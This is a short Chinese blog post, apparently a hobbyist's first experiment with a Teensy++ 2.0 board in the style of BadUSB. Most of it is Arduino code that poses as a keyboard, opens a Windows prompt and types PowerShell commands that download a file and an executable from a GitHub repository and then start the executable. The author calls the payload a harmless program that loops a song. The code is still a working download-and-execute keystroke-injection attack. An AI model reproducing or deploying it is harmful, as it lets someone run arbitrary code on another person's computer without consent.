头一次接触开发板,使用的是Teensy++2.0。源动力来自于BadUSB。
Teensy
这是一个用于模拟键鼠主控的开发板,可以用作渗透或者其它等。
Arduino 和 Teensyduino
自行安装。
实例
测试环境为Win10,使用powershell。
使用开发板实现文件自动下载运行。
写入代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| void setup() {
delay(5000);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_ESC);
Keyboard.releaseAll();
delay(500);
delay(5000);
Keyboard.print("powershell $client = new-object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$client.DownloadFile('https://github.com/NanFengx/Teensy/raw/master/OnlyMyRailgunTest.wav', 'D:\\OnlyMyRailgunTest.wav');exit;");
delay(5000);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(15000);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_ESC);
Keyboard.releaseAll();
delay(500);
delay(5000);
Keyboard.print("powershell $client = new-object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$client.DownloadFile('https://github.com/NanFengx/Teensy/raw/master/Project1.exe', 'D:\\Project1.exe');start D:\\Project1.exe;");
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(30000);
}
void loop() {}
|
其中这两段话:
1
2
3
4
5
6
7
8
9
10
| powershell $client = new-object System.Net.WebClient;
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$client.DownloadFile('https://github.com/NanFengx/Teensy/raw/master/
OnlyMyRailgunTest.wav', 'D:\\OnlyMyRailgunTest.wav');
exit;
powershell $client = new-object System.Net.WebClient;
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$client.DownloadFile('https://github.com/NanFengx/Teensy/raw/master/Project1.exe', 'D:\\Project1.exe');
start D:\\Project1.exe;
|
利用powershell从github上下载事先准备好的可执行文件。我自己写了一个小程序,无限播放Only my railgun的片段,因为github上最大只允许25M,playsound又只能播放WAV,又不想弄其它的库函数或者之类的。
运行效果:
顺便吐槽,国内github速度是真的慢。